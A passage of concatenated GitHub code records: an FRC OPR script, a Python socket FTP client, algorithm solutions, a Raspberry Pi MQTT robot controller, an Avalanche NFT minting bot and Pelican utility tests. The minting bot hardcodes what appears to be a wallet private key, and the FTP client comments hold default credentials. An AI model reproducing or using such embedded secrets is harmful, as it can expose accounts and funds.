oprs.append(eventData[event['key']]['oprs'][team['key']])\r\n else:\r\n eventData[event['key']] = tba.event_oprs(event['key'])\r\n oprs.append(eventData[event['key']]['oprs'][team['key']])\r\n #Print errors, typically this has just been teams winning awards when\r\n #they didn't compete (ie Dean's list, WFA, etc.)\r\n except Exception as e:\r\n print(e)\r\n #Handle teams that we didn't get data for, zero is an OK value for them.\r\n if len(oprs) is 0:\r\n maxOPR = 0\r\n avgOPR = 0\r\n else:\r\n maxOPR = max(oprs)\r\n avgOPR = stat.mean(oprs)\r\n \r\n #Store team data in a dict, append that dict to the list of teams \r\n teamData = {'num': team['team_number'], 'maxOPR': maxOPR, 'avgOPR': avgOPR, 'city': team['city'], 'state': team['state_prov'], 'rookie_year': team['rookie_year']}\r\n teamsList.append(teamData)\r\n\r\ngen.listOfDictToCSV(DISTRICT + str(YEAR) + \"OPRs\", teamsList)","repo_name":"PChild/frc-data-scripts","sub_path":"districtOPRs.py","file_name":"districtOPRs.py","file_ext":"py","file_size_in_byte":2127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70240348268","text":"#-*- coding:utf-8 -*-\nimport socket\nimport os,sys\nfrom conf import configure as conf\nimport json\nimport hashlib\nclass Myclient(object):\n #客户端类\n\n def __init__(self,ip_port,name):\n self.func_dict = {\n 'help': 'help',\n 'get': 'get',\n 'put': 'put',\n 'exit': 'exit',\n 'ls': 'ls',\n 'cd': 'cd',\n 'del': 'del'\n }\n #定义socket的信息,但是不连接。。。要验证登录再连接\n self.sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n self.ip_port = ip_port\n self.exit_flag = False\n self.name = name\n # if self.auth():\n # self.interactive()\n\n def connect(self):\n #连接\n self.sock.connect((self.ip_port))\n def auth(self,message):\n #认证\n msg_dct = {\n \"action\": \"ftp_auth\"\n }\n #msg_dct[\"msg\"] = [\"auth\", \"admin\", \"123456\"]\n msg_dct[\"msg\"] = message\n # 第一次发送操作文件信息\n send_msg = self.format_msg(msg_dct)\n self.sock.send(send_msg)\n server_response = self.sock.recv(1024)\n server_dct = server_response.decode(\"utf-8\")\n response_list = json.loads(server_dct)\n msg_type = response_list.split('::')[0]\n msg_result = response_list.split('::')[1]\n if msg_type == 'auth' and msg_result == 'success':\n return True\n elif msg_type == 'auth' and msg_result == 'failed':\n print('认证失败%s' % msg_result)\n return False\n else:\n print('接受信息错误!请联系管理员')\n\n def start(self,message):\n self.auth_result = False\n #开始,认证用户,保存用户登录信息和目录信息到\n self.connect()\n print('欢迎%s使用ftp'%self.name)\n #print(message)\n self.auth_result = self.auth(message)\n while self.auth_result:\n return True\n def cd(self):\n self.cmd_send('ls')\n # 接收文件状态,是否改变成功\n server_response = self.sock.recv(1024)\n if server_response:\n server_dct = self.loads_msg(server_response)\n cur_dir = server_dct['list']['root']\n while True:\n print('当前目录%s' % cur_dir)\n selected_path = input('请输入切换的目录名')\n if selected_path == 'q' or selected_path == 'Q':\n return False\n if selected_path in server_dct['list']['dirs'] or selected_path == '~' or selected_path == '..':\n self.cmd_send(\"cd\", \"cd::\" + selected_path)\n server_response = self.sock.recv(1024)\n if server_response:\n server_dct = self.loads_msg(server_response)\n server_dct = server_dct.split('::')\n if server_dct[1] == 'success' and server_dct[0] == 'cd':\n print('切换目录成功')\n return True\n else:\n print('无效的路径,请重试')\n def pwd(self):\n #显示当前路径\n self.cmd_send('ls')\n # 接收文件状态,是否改变成功\n server_response = self.sock.recv(1024)\n if server_response:\n server_dct = self.loads_msg(server_response)\n cur_dir = server_dct['list']['root']\n print('当前目录%s' % cur_dir)\n\n def put(self, *args):\n \"\"\"客户端,发送文件,已测试可以单个文件上传\"\"\"\n cmd_split = args[0].split(\" \")\n if len(cmd_split)>0:\n file_fullname = cmd_split[0]\n # 判断文件是否存在,存在则继续\n if os.path.isfile(file_fullname):\n size = os.stat(file_fullname).st_size # 获取文件大小\n msg_dct = {\n \"filename\": os.path.basename(file_fullname),\n \"size\": size,\n \"override\": True\n }\n send_len = 0\n # 第一次发送操作文件信息\n self.cmd_send('put',msg_dct)\n # 确认接收,防止粘包,确认服务器空间是否足够\n server_response = self.sock.recv(1024)\n server_response = self.loads_msg(server_response)\n if server_response['status'] == \"continue\" :\n print(\"空间足够\")\n if server_response['breakout']:\n print('存在文件断点%s,正在续传...' % server_response['breakout'])\n # 接着发送文件内容\n m = hashlib.md5()\n break_size = server_response['breakout']\n send_len = break_size\n elif server_response['status'] == \"OK\" :\n pass\n elif server_response['status'] == \"rename\":\n print('检测到重名文件,自动重新命名')\n else:\n print(\"空间不足\")\n return # 中断操作\n\n # 接着发送文件内容\n m = hashlib.md5()\n f = open(file_fullname, \"rb\")\n if server_response['breakout']:\n f.seek(break_size, 0)\n print(f.tell())\n for line in f:\n self.sock.send(line)\n m.update(line)\n send_len += len(line)\n #经过测试,进度条在pycharm里不会显示,在控制台里显示良好。\n percent = int(round(send_len/size, 2)*100)\n progress_mark = \"=\" * int(percent / 2)\n print(\"[%s/%s]%s>%s\" % (size, send_len, progress_mark, percent),end= '\\r')\n sys.stdout.flush()\n if send_len >= size:\n print('文件读取完毕')\n f.close()\n\n # 可以增加MD5校验\n self.sock.send(m.hexdigest().encode(\"utf-8\"))\n res = self.sock.recv(1024).decode(\"utf-8\")\n if res ==\"0\" and server_response['status'] == \"OK\":\n print(\"文件传输成功,剩余空间%s\"%server_response['size'])\n elif server_response['status'] == \"rename\":\n print(\"文件传输成功,重命名为new_%s\" % msg_dct['filename'])\n else:\n print(\"文件传输失败\")\n else:\n print(\"文件不存在 %s\" % file_fullname)\n def get(self,*args):\n #客户端请求下载\n try:\n cmd_split = args[0].split(\" \")\n if len(cmd_split) > 0:#参数正确则继续\n file_name = cmd_split[0]\n msg_dct = {\n \"filename\": file_name,\n \"LocalPath\": \"D:\\\\\"\n }\n # 第一次发送操作文件信息\n self.cmd_send('get', msg_dct)#发送get请求握手\n res = self.sock.recv(1024)\n decode_res = self.loads_msg(res)\n decode_res_cmd = decode_res.split(\"::\")[0]\n decode_res_result = decode_res.split(\"::\")[1]\n decode_res_filesize = int(decode_res.split(\"::\")[2])#文件大小\n if decode_res_cmd == 'get' and decode_res_result == 'READY':\n #握手确认文件存在,下一步进入传输阶段\n file_fullname = os.path.join(msg_dct['LocalPath'],file_name)\n f = open(file_fullname, \"wb\")\n received_size = 0\n m = hashlib.md5()\n while received_size < decode_res_filesize:\n if decode_res_filesize - received_size > 1024:\n size = 1024\n else:\n size = decode_res_filesize - received_size\n data = self.sock.recv(size)#接收文件\n f.write(data)\n m.update(data)\n received_size += len(data)\n else:\n f.close()\n received_md5 = self.sock.recv(1024).decode(\"utf-8\")#接收文件校验\n if m.hexdigest() == received_md5:\n if os.path.isfile(file_fullname):\n print(\"文件下载成功%s\" %(file_fullname))\n msg = self.format_msg(\"get::success\")\n self.sock.send(msg)\n else:\n print(\"文件上传出错\")\n msg = self.format_msg(\"get::failed\")\n self.sock.send(msg)\n else:\n print('get参数不正确')\n except Exception as e:\n print(e)\n\n\n def testConn(self):\n msg_dct = {\n \"action\": \"testConn\"\n }\n cmdstr = json.dumps(msg_dct)\n self.sock.send(cmdstr.encode(\"utf-8\"))\n print('???')\n # # 接收文件状态,是否改变成功\n # server_response = self.sock.recv(1024)\n # server_dct = server_response.decode(\"utf-8\")\n #\n # print(server_dct[\"list\"])\n def ls2(self, *args):\n \"\"\"客户端,查看文件目录\"\"\"\n self.cmd_send('ls')\n # 接收文件状态,是否改变成功\n server_response = self.sock.recv(1024)\n if server_response:\n server_dct = self.loads_msg(server_response)\n cur_dir = server_dct['list']['root']\n print('当前目录%s' % cur_dir)\n for key in server_dct['list']['dirs']:\n print('d---------\\t%s' % key)\n for key in server_dct['list']['files']:\n print('f---------\\t%s' % key)\n def format_msg(self,msg):\n return json.dumps(msg).encode(\"utf-8\")\n def loads_msg(self,msg):\n return json.loads(msg.decode(\"utf-8\"))\n\n def cmd_send(self,command,msg=None):\n if self.auth_result:\n msg_dct = {\n \"action\": command,\n \"msg\": msg\n }\n # 第一次发送操作文件信息\n msg = self.format_msg(msg_dct)\n self.sock.send(msg)\n def exit(self):\n #退出\n self.auth_result = False\n self.sock.close()\n# ip_port = (\"127.0.0.1\",9999)\n# c = Myclient(ip_port,'admin')\n# #c.start()\n# c.start([\"auth\",\"admin\",\"123456\"])\n# x = '-l'.encode(\"utf-8\")\n# c.auth()\n# c.sock.close()\n","repo_name":"ddoplayer2012/py","sub_path":"work3/ftp/ftp0223/core/user_clients.py","file_name":"user_clients.py","file_ext":"py","file_size_in_byte":10733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70576402987","text":"def solution(s):\n\n def expand(left: int, right: int) -> str:\n while 0 <= left and right < len(s) and s[left] == s[right]:\n left -= 1\n right += 1\n\n return s[left: right + 1]\n\n if len(s) == 1 or s == s[::-1]:\n return len(s)\n\n result = \"\"\n for i in range(len(s) - 1):\n result = max(result, expand(i, i), expand(i, i+1), key=len)\n\n return len(result)\n\n\nif __name__ == \"__main__\":\n s = \"abcdcba\"\n result = 7\n answer = solution(s)\n print(result == answer, answer)\n","repo_name":"lymchgmk/Algorithm-Problem-Solving","sub_path":"Programmers/연습문제/Level 3/가장 긴 팰린드롬/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73407981547","text":"def solution(m, n, puddles):\n board = [[0] * m for _ in range(n)]\n dy = [-1, 0]\n dx = [0, -1]\n board[0][0] = 1\n for puddle in puddles:\n x, y = puddle\n board[y - 1][x - 1] = -1\n for i in range(n):\n for j in range(m):\n if board[i][j] == -1:\n continue\n for k in range(2):\n yy = i + dy[k]\n xx = j + dx[k]\n if 0 <= yy < n and 0 <= xx < m:\n if board[yy][xx] == -1:\n continue\n board[i][j] += board[yy][xx]\n\n answer = board[-1][-1] % 1000000007\n return answer","repo_name":"lhbbbb/TIL","sub_path":"Algorithm/Programmers/DP/등굣길.py","file_name":"등굣길.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30227431285","text":"import paho.mqtt.client as paho\nimport json\nfrom crontab import CronTab\nimport datetime\nimport threading\nimport RPi.GPIO as GPIO\nimport time\nimport picamera\nfrom datetime import datetime\nimport argparse\n\nap = argparse.ArgumentParser()\nap.add_argument(\"-q\", \"--query\", required=True,\n\thelp=\"Query with plant ID's to be read\")\nargs = vars(ap.parse_args())\n\nqr_codes = args[\"query\"].split(\",\")\n\nprint(qr_codes)\n\nis_too_close = False\nobject_was_detected = False\nturn = \"none\"\ntopics = [\"testProximity\", \"objectDetection\", \"barcodeReader\"]\nis_right_plant = False\nfindID = \"\"\nhow_close = 0.0\n\n\n# This is the Subscriber\n\ndef on_connect(client, userdata, flags, rc):\n print(\"Connected with result code \"+str(rc))\n for topic in topics:\n client.subscribe(topic, qos=2)\n\ndef on_message(client, userdata, msg):\n global is_too_close\n global turn\n global object_was_detected\n global is_right_plant\n global findId \n global how_close\n if msg.topic == \"testProximity\":\n distance = float(msg.payload.decode('utf-8'))\n how_close = distance\n if distance < 15.0:\n is_too_close = True\n else:\n is_too_close = False\n elif msg.topic == \"objectDetection\":\n obj_detection = json.loads(msg.payload.decode('utf-8'))\n if obj_detection[\"object\"] == \"plant\" or obj_detection[\"object\"] == \"pottedplant\" or obj_detection[\"object\"] == \"person\":\n object_was_detected = True\n coord1 = int(obj_detection[\"coords\"][0])\n coord2 = int(obj_detection[\"coords\"][1])\n center = (coord1 + coord2) / 2\n print(center)\n if center < 250:\n turn = \"left\"\n elif center > 250:\n turn = \"right\"\n else: \n turn = \"none\"\n elif msg.topic == \"barcodeReader\":\n get_value = msg.payload.decode('utf-8')\n print(get_value)\n global findID \n findID = get_value\n if get_value in qr_codes:\n is_right_plant = True\n \n \nbroker=\"localhost\"\nport=1883\nuser=\"guest\"\npassword=\"guest\"\nclient=paho.Client(\"scheduler\")\nclient.on_connect = on_connect\nclient.on_message = on_message\nclient.username_pw_set(user, password=password)\n\n\nGPIO.setmode(GPIO.BCM)\n\nfwdleft = 24\nfwdright = 25\n\nrevleft = 23\nrevright = 27\n\nmotors = [fwdleft,fwdright,revleft,revright]\n\nfor item in motors:\n\tGPIO.setup(item, GPIO.OUT)\n\ndef forward2(i):\n\tGPIO.output(fwdright, True)\n\tGPIO.output(fwdleft, True)\n\ndef right(i):\n\tGPIO.output(revright, True)\n\tGPIO.output(fwdleft, True)\n\ttime.sleep(i)\n\tGPIO.output(revright, False)\n\tGPIO.output(fwdleft, False)\n\ndef left2(i):\n\tGPIO.output(fwdright, True)\n\tGPIO.output(revleft, True)\n\ttime.sleep(i)\n\tGPIO.output(fwdright, False)\n\tGPIO.output(revleft, False)\n\ndef reverse(i):\n\tGPIO.output(revleft, True)\n\tGPIO.output(revright, True)\n\ttime.sleep(i)\n\tGPIO.output(revleft, False)\n\tGPIO.output(revright, False)\n\ndef stop():\n GPIO.output(revleft, False)\n GPIO.output(revright, False)\n GPIO.output(fwdright, False)\n GPIO.output(fwdleft, False)\n\n\ndef subscribing():\n print(\"started thread\")\n client.connect(broker,port)\n while(True):\n client.loop()\n\ndef publish():\n print(\"sending message\")\n print(findID)\n ret= client.publish(\"takePicture\",findID,2)\n\n\nif __name__ == \"__main__\":\n mqtt_subscriber=threading.Thread(target=subscribing)\n mqtt_subscriber.start()\n try:\n print(\"R E A D Y\")\n counter = 0\n while(1):\n if is_too_close:\n if how_close < 15.0:\n stop()\n time.sleep(2)\n if object_was_detected or is_right_plant:\n stop()\n print(\"taking a picture\")\n time.sleep(5)\n object_was_detected = False\n is_right_plant = False\n is_too_close = False\n left2(0.5)\n else:\n counter = 0\n print(\"turning left\")\n left2(0.3)\n is_too_close = False\n else:\n if turn == \"none\":\n forward2(50)\n print(\"going forward\")\n elif turn == \"left\":\n left2(0.1)\n print(\"turning left\")\n turn = \"none\"\n elif turn == \"right\":\n print(\"turning right\")\n right(0.1)\n turn = \"none\"\n\n except KeyboardInterrupt:\n print(\"E X I T\")\n GPIO.cleanup()\n mqtt_subscriber.terminate()\n","repo_name":"carolinepetrova/iPlant","sub_path":"iPlant_Robot_Source/car_controls.py","file_name":"car_controls.py","file_ext":"py","file_size_in_byte":4646,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"18314475835","text":"# !/usr/bin/python\nimport time\n\nfrom eth_account import Account\nfrom web3 import Web3\nfrom web3.middleware import geth_poa_middleware\nfrom web3.types import TxParams\n\nfrom flatlaunchpeg import FLATLAUNCHPEG_ABI\n\n\n# See the README.md for more information.\n\ndef main():\n print('Loading')\n\n # Settings for the mint. I've put in examples so you know what should go in here.\n # Make sure you replace the contract address and private key!\n # What NFT are you minting?\n contract_address = '0x048c939bEa33c5dF4d2C69414B9385d55b3bA62E'\n # Your private key; use a special-purpose low asset account.\n private_key = '0xf964f5e1d7acf7265dfec7cd70821324786a2271e4bddf6a3d3630e45ee1015c'\n # This should be enough gas, but you might have to boost it if you're minting a lot of NFTs at one time.\n gas_limit = 300_000\n # This is the 'max' gas; you will only actually pay whatever the block fee ends up being.\n max_gas_in_gwei = 50\n # This is a tip; higher tips get placed earlier in the block.\n gas_tip_in_gwei = 2\n\n # Load the account, connect to Avalanche, and prepare the mint contract proxy.\n account = Account.from_key(private_key)\n node_uri = 'https://api.avax.network/ext/bc/C/rpc'\n w3 = Web3(Web3.HTTPProvider(node_uri))\n w3.middleware_onion.inject(geth_poa_middleware, layer=0)\n mint_contract = w3.eth.contract(address=Web3.toChecksumAddress(contract_address), abi=FLATLAUNCHPEG_ABI)\n\n # Load some stuff from the contract. You could hardcode these values instead.\n start_time = mint_contract.functions.publicSaleStartTime().call()\n price = mint_contract.functions.salePrice().call()\n quantity = mint_contract.functions.maxPerAddressDuringMint().call()\n print('Detected Configuration:')\n print(' start_time:', start_time)\n print(' price:', price)\n print(' quantity:', quantity)\n print('Cur time:', int(time.time()))\n\n # Loop until the mint is ready.\n while time.time() - start_time < 0:\n time.sleep(.1)\n\n # Create the basic transaction that we're going to send.\n base_tx: TxParams = {\n 'type': 0x2,\n 'chainId': w3.eth.chain_id,\n 'gas': gas_limit,\n 'maxFeePerGas': Web3.toWei(max_gas_in_gwei, 'gwei'),\n 'maxPriorityFeePerGas': Web3.toWei(gas_tip_in_gwei, 'gwei'),\n 'nonce': w3.eth.get_transaction_count(account.address),\n 'value': price * quantity,\n }\n\n # Create the appropriate 'data' field and append it to the tx.\n contract_function = mint_contract.functions.publicSaleMint(quantity)\n contract_tx = contract_function.buildTransaction(base_tx)\n\n # Sign it, and send it.\n signed_tx = w3.eth.account.sign_transaction(contract_tx, account.privateKey)\n tx_hash = w3.eth.send_raw_transaction(signed_tx.rawTransaction)\n\n # Wait for the tx to be included into the blockchain.\n hex_hash = w3.toHex(tx_hash)\n receipt = w3.eth.wait_for_transaction_receipt(hex_hash)\n\n # Dump the finalized tx to the console.\n print('Done!')\n print(receipt)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"tactical-retreat/nft-bot-public","sub_path":"python/simple_bot.py","file_name":"simple_bot.py","file_ext":"py","file_size_in_byte":3055,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"36456392760","text":"import locale\nimport logging\nimport os\nimport shutil\nfrom datetime import timezone\nfrom sys import platform\nfrom tempfile import mkdtemp\n\ntry:\n from zoneinfo import ZoneInfo\nexcept ModuleNotFoundError:\n from backports.zoneinfo import ZoneInfo\n\nfrom pelican import utils\nfrom pelican.generators import TemplatePagesGenerator\nfrom pelican.settings import read_settings\nfrom pelican.tests.support import (\n LoggedTestCase,\n get_article,\n locale_available,\n unittest,\n)\nfrom pelican.writers import Writer\n\n\nclass TestUtils(LoggedTestCase):\n _new_attribute = \"new_value\"\n\n def setUp(self):\n super().setUp()\n self.temp_output = mkdtemp(prefix=\"pelicantests.\")\n\n def tearDown(self):\n super().tearDown()\n shutil.rmtree(self.temp_output)\n\n @utils.deprecated_attribute(\n old=\"_old_attribute\", new=\"_new_attribute\", since=(3, 1, 0), remove=(4, 1, 3)\n )\n def _old_attribute():\n return None\n\n def test_deprecated_attribute(self):\n value = self._old_attribute\n self.assertEqual(value, self._new_attribute)\n self.assertLogCountEqual(\n count=1,\n msg=(\n \"_old_attribute has been deprecated since 3.1.0 and will be \"\n \"removed by version 4.1.3. Use _new_attribute instead\"\n ),\n level=logging.WARNING,\n )\n\n def test_get_date(self):\n # valid ones\n date = utils.SafeDatetime(year=2012, month=11, day=22)\n date_hour = utils.SafeDatetime(year=2012, month=11, day=22, hour=22, minute=11)\n date_hour_z = utils.SafeDatetime(\n year=2012, month=11, day=22, hour=22, minute=11, tzinfo=timezone.utc\n )\n date_hour_est = utils.SafeDatetime(\n year=2012, month=11, day=22, hour=22, minute=11, tzinfo=ZoneInfo(\"EST\")\n )\n date_hour_sec = utils.SafeDatetime(\n year=2012, month=11, day=22, hour=22, minute=11, second=10\n )\n date_hour_sec_z = utils.SafeDatetime(\n year=2012,\n month=11,\n day=22,\n hour=22,\n minute=11,\n second=10,\n tzinfo=timezone.utc,\n )\n date_hour_sec_est = utils.SafeDatetime(\n year=2012,\n month=11,\n day=22,\n hour=22,\n minute=11,\n second=10,\n tzinfo=ZoneInfo(\"EST\"),\n )\n date_hour_sec_frac_z = utils.SafeDatetime(\n year=2012,\n month=11,\n day=22,\n hour=22,\n minute=11,\n second=10,\n microsecond=123000,\n tzinfo=timezone.utc,\n )\n dates = {\n \"2012-11-22\": date,\n \"2012/11/22\": date,\n \"2012-11-22 22:11\": date_hour,\n \"2012/11/22 22:11\": date_hour,\n \"22-11-2012\": date,\n \"22/11/2012\": date,\n \"22.11.2012\": date,\n \"22.11.2012 22:11\": date_hour,\n \"2012-11-22T22:11Z\": date_hour_z,\n \"2012-11-22T22:11-0500\": date_hour_est,\n \"2012-11-22 22:11:10\": date_hour_sec,\n \"2012-11-22T22:11:10Z\": date_hour_sec_z,\n \"2012-11-22T22:11:10-0500\": date_hour_sec_est,\n \"2012-11-22T22:11:10.123Z\": date_hour_sec_frac_z,\n }\n\n # examples from http://www.w3.org/TR/NOTE-datetime\n iso_8601_date = utils.SafeDatetime(year=1997, month=7, day=16)\n iso_8601_date_hour_tz = utils.SafeDatetime(\n year=1997,\n month=7,\n day=16,\n hour=19,\n minute=20,\n tzinfo=ZoneInfo(\"Europe/London\"),\n )\n iso_8601_date_hour_sec_tz = utils.SafeDatetime(\n year=1997,\n month=7,\n day=16,\n hour=19,\n minute=20,\n second=30,\n tzinfo=ZoneInfo(\"Europe/London\"),\n )\n iso_8601_date_hour_sec_ms_tz = utils.SafeDatetime(\n year=1997,\n month=7,\n day=16,\n hour=19,\n minute=20,\n second=30,\n microsecond=450000,\n tzinfo=ZoneInfo(\"Europe/London\"),\n )\n iso_8601 = {\n \"1997-07-16\": iso_8601_date,\n \"1997-07-16T19:20+01:00\": iso_8601_date_hour_tz,\n \"1997-07-16T19:20:30+01:00\": iso_8601_date_hour_sec_tz,\n \"1997-07-16T19:20:30.45+01:00\": iso_8601_date_hour_sec_ms_tz,\n }\n\n # invalid ones\n invalid_dates = [\"2010-110-12\", \"yay\"]\n\n for value, expected in dates.items():\n self.assertEqual(utils.get_date(value), expected, value)\n\n for value, expected in iso_8601.items():\n self.assertEqual(utils.get_date(value), expected, value)\n\n for item in invalid_dates:\n self.assertRaises(ValueError, utils.get_date, item)\n\n def test_slugify(self):\n samples = (\n (\"this is a test\", \"this-is-a-test\"),\n (\"this is a test\", \"this-is-a-test\"),\n (\"this → is ← a ↑ test\", \"this-is-a-test\"),\n (\"this--is---a test\", \"this-is-a-test\"),\n (\n \"unicode測試許功蓋,你看到了嗎?\",\n \"unicodece-shi-xu-gong-gai-ni-kan-dao-liao-ma\",\n ),\n (\n \"大飯原発4号機、18日夜起動へ\",\n \"da-fan-yuan-fa-4hao-ji-18ri-ye-qi-dong-he\",\n ),\n )\n\n settings = read_settings()\n subs = settings[\"SLUG_REGEX_SUBSTITUTIONS\"]\n\n for value, expected in samples:\n self.assertEqual(utils.slugify(value, regex_subs=subs), expected)\n\n self.assertEqual(utils.slugify(\"Cat\", regex_subs=subs), \"cat\")\n self.assertEqual(\n utils.slugify(\"Cat\", regex_subs=subs, preserve_case=False), \"cat\"\n )\n self.assertEqual(\n utils.slugify(\"Cat\", regex_subs=subs, preserve_case=True), \"Cat\"\n )\n\n def test_slugify_use_unicode(self):\n samples = (\n (\"this is a test\", \"this-is-a-test\"),\n (\"this is a test\", \"this-is-a-test\"),\n (\"this → is ← a ↑ test\", \"this-is-a-test\"),\n (\"this--is---a test\", \"this-is-a-test\"),\n (\"unicode測試許功蓋,你看到了嗎?\", \"unicode測試許功蓋你看到了嗎\"),\n (\"Çığ\", \"çığ\"),\n )\n\n settings = read_settings()\n subs = settings[\"SLUG_REGEX_SUBSTITUTIONS\"]\n\n for value, expected in samples:\n self.assertEqual(\n utils.slugify(value, regex_subs=subs, use_unicode=True), expected\n )\n\n # check with preserve case\n for value, expected in samples:\n self.assertEqual(\n utils.slugify(\n \"Çığ\", regex_subs=subs, preserve_case=True, use_unicode=True\n ),\n \"Çığ\",\n )\n\n # check normalization\n samples = (\n (\"大飯原発4号機、18日夜起動へ\", \"大飯原発4号機18日夜起動へ\"),\n (\n \"\\N{LATIN SMALL LETTER C}\\N{COMBINING CEDILLA}\",\n \"\\N{LATIN SMALL LETTER C WITH CEDILLA}\",\n ),\n )\n for value, expected in samples:\n self.assertEqual(\n utils.slugify(value, regex_subs=subs, use_unicode=True), expected\n )\n\n def test_slugify_substitute(self):\n samples = (\n (\"C++ is based on C\", \"cpp-is-based-on-c\"),\n (\"C+++ test C+ test\", \"cpp-test-c-test\"),\n (\"c++, c#, C#, C++\", \"cpp-c-sharp-c-sharp-cpp\"),\n (\"c++-streams\", \"cpp-streams\"),\n )\n\n settings = read_settings()\n subs = [\n (r\"C\\+\\+\", \"CPP\"),\n (r\"C#\", \"C-SHARP\"),\n ] + settings[\"SLUG_REGEX_SUBSTITUTIONS\"]\n for value, expected in samples:\n self.assertEqual(utils.slugify(value, regex_subs=subs), expected)\n\n def test_slugify_substitute_and_keeping_non_alphanum(self):\n samples = (\n (\"Fedora QA\", \"fedora.qa\"),\n (\"C++ is used by Fedora QA\", \"cpp is used by fedora.qa\"),\n (\"C++ is based on C\", \"cpp is based on c\"),\n (\"C+++ test C+ test\", \"cpp+ test c+ test\"),\n )\n\n subs = [\n (r\"Fedora QA\", \"fedora.qa\"),\n (r\"c\\+\\+\", \"cpp\"),\n ]\n for value, expected in samples:\n self.assertEqual(utils.slugify(value, regex_subs=subs), expected)\n\n def test_get_relative_path(self):\n samples = (\n (os.path.join(\"test\", \"test.html\"), os.pardir),\n (\n os.path.join(\"test\", \"test\", \"test.html\"),\n os.path.join(os.pardir, os.pardir),\n ),\n (\"test.html\", os.curdir),\n (os.path.join(\"/test\", \"test.html\"), os.pardir),\n (\n os.path.join(\"/test\", \"test\", \"test.html\"),\n os.path.join(os.pardir, os.pardir),\n ),\n (\"/test.html\", os.curdir),\n )\n\n for value, expected in samples:\n self.assertEqual(utils.get_relative_path(value), expected)\n\n def test_truncate_html_words(self):\n # Plain text.\n self.assertEqual(utils.truncate_html_words(\"short string\", 20), \"short string\")\n self.assertEqual(\n utils.truncate_html_words(\"word \" * 100, 20), \"word \" * 20 + \"…\"\n )\n\n # Plain text with Unicode content.\n self.assertEqual(\n utils.truncate_html_words(\n \"我愿意这样,朋友——我独自远行,不但没有你,\\\n 并且再没有别的影在黑暗里。\",\n 12,\n ),\n \"我愿意这样,朋友——我独自远行\" + \" …\",\n )\n self.assertEqual(\n utils.truncate_html_words(\n \"Ты мелькнула, ты предстала, Снова сердце задрожало,\", 3\n ),\n \"Ты мелькнула, ты\" + \" …\",\n )\n self.assertEqual(\n utils.truncate_html_words(\"Trong đầm gì đẹp bằng sen\", 4),\n \"Trong đầm gì đẹp\" + \" …\",\n )\n\n # Words enclosed or intervaled by HTML tags.\n self.assertEqual(\n utils.truncate_html_words(\"

    \" + \"word \" * 100 + \"

    \", 20),\n \"

    \" + \"word \" * 20 + \"…

    \",\n )\n self.assertEqual(\n utils.truncate_html_words(\n '' + \"word \" * 100 + \"\", 20\n ),\n '' + \"word \" * 20 + \"…\",\n )\n self.assertEqual(\n utils.truncate_html_words(\"
    \" + \"word \" * 100, 20),\n \"
    \" + \"word \" * 20 + \"…\",\n )\n self.assertEqual(\n utils.truncate_html_words(\"\" + \"word \" * 100, 20),\n \"\" + \"word \" * 20 + \"…\",\n )\n\n # Words enclosed or intervaled by HTML tags with a custom end\n # marker containing HTML tags.\n self.assertEqual(\n utils.truncate_html_words(\n \"

    \" + \"word \" * 100 + \"

    \", 20, \"marker\"\n ),\n \"

    \" + \"word \" * 20 + \"marker

    \",\n )\n self.assertEqual(\n utils.truncate_html_words(\n '' + \"word \" * 100 + \"\",\n 20,\n \"marker\",\n ),\n '' + \"word \" * 20 + \"marker\",\n )\n self.assertEqual(\n utils.truncate_html_words(\n \"
    \" + \"word \" * 100, 20, \"marker\"\n ),\n \"
    \" + \"word \" * 20 + \"marker\",\n )\n self.assertEqual(\n utils.truncate_html_words(\n \"\" + \"word \" * 100, 20, \"marker\"\n ),\n \"\" + \"word \" * 20 + \"marker\",\n )\n\n # Words with hypens and apostrophes.\n self.assertEqual(utils.truncate_html_words(\"a-b \" * 100, 20), \"a-b \" * 20 + \"…\")\n self.assertEqual(\n utils.truncate_html_words(\"it's \" * 100, 20), \"it's \" * 20 + \"…\"\n )\n\n # Words with HTML entity references.\n self.assertEqual(\n utils.truncate_html_words(\"é \" * 100, 20), \"é \" * 20 + \"…\"\n )\n self.assertEqual(\n utils.truncate_html_words(\"café \" * 100, 20),\n \"café \" * 20 + \"…\",\n )\n self.assertEqual(\n utils.truncate_html_words(\"èlite \" * 100, 20),\n \"èlite \" * 20 + \"…\",\n )\n self.assertEqual(\n utils.truncate_html_words(\"cafetiére \" * 100, 20),\n \"cafetiére \" * 20 + \"…\",\n )\n self.assertEqual(\n utils.truncate_html_words(\"∫dx \" * 100, 20), \"∫dx \" * 20 + \"…\"\n )\n\n # Words with HTML character references inside and outside\n # the ASCII range.\n self.assertEqual(\n utils.truncate_html_words(\"é \" * 100, 20), \"é \" * 20 + \"…\"\n )\n self.assertEqual(\n utils.truncate_html_words(\"∫dx \" * 100, 20), \"∫dx \" * 20 + \"…\"\n )\n\n # Words with invalid or broken HTML references.\n self.assertEqual(utils.truncate_html_words(\"&invalid;\", 20), \"&invalid;\")\n self.assertEqual(\n utils.truncate_html_words(\"�\", 20), \"�\"\n )\n self.assertEqual(\n utils.truncate_html_words(\"�\", 20), \"�\"\n )\n self.assertEqual(utils.truncate_html_words(\"&mdash text\", 20), \"&mdash text\")\n self.assertEqual(utils.truncate_html_words(\"Ӓ text\", 20), \"Ӓ text\")\n self.assertEqual(utils.truncate_html_words(\"઼ text\", 20), \"઼ text\")\n\n def test_process_translations(self):\n fr_articles = []\n en_articles = []\n\n # create a bunch of articles\n # 0: no translation metadata\n fr_articles.append(\n get_article(lang=\"fr\", slug=\"yay0\", title=\"Titre\", content=\"en français\")\n )\n en_articles.append(\n get_article(lang=\"en\", slug=\"yay0\", title=\"Title\", content=\"in english\")\n )\n # 1: translation metadata on default lang\n fr_articles.append(\n get_article(lang=\"fr\", slug=\"yay1\", title=\"Titre\", content=\"en français\")\n )\n en_articles.append(\n get_article(\n 